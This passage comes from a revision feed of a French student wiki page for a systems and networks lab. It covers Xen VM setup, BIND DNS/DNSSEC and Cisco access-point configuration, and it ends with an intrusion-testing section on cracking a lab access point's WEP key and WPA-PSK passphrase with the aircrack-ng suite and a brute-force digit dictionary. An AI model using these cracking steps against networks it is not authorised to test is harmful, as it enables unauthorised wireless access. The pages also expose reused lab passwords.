- Modifier le fichier '''named.conf.local''' pour utiliser db.toad59.site.signed&lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;etc/bind/db.toad59.site.signed&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56424</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56424"/>
				<updated>2021-11-19T12:42:47Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Configuration réseau */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Lancer les commandes &lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
- Obtention d'un certificat via OpenSSL :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout toad59.site.key -out toad59.site.csr&lt;br /&gt;
&lt;br /&gt;
Dans le champ common name, il est important de saisir : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Acheter un certificat clé pour se connecter de façon sécurisée sur Gandi en passant par la rubrique Cerificat SSL.csr, généré à l'étape précédente.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Il faut à présent sécuriser le serveur DNS en signant la zone correspondant à mon nom de domaine.&lt;br /&gt;
&lt;br /&gt;
- Dé-commenter la ligne suivante dans le fichier '''named.conf.options''' :&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
- Créer un repertoire '''toad59.space.dnssec''' pour y génerer des clefs :&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de signature de clefs de zone'''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de zone pour les enregistrements '''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
- Renommer les clefs :&lt;br /&gt;
 mv Ktoad59.site.+005+26968.key toad59.site-ksk.key&lt;br /&gt;
 mv Ktoad59.site.+005+26968.private toad59.site-ksk.private&lt;br /&gt;
 mv Ktoad59.site.+005+27570.key toad59.site-zsk.key&lt;br /&gt;
 mv Ktoad59.site.+005+27570.private toad59.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
- Inclure les clefs publiques dans dans le fichier db.toad59.site&lt;br /&gt;
 $include /etc/bind/lulya.space.dnssec/toad59.site-ksk.key&lt;br /&gt;
 $include /etc/bind/lulya.space.dnssec/toad59.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
- Signer les enregistrements à partir du répertoire '''toad59.space.dnssec'''&lt;br /&gt;
 dnssec-signzone -o toad59.site -k toad59.site-ksk  ../db.toad59.site toad59.site-zsk&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56423</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56423"/>
				<updated>2021-11-19T12:39:36Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Sécurisation du serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
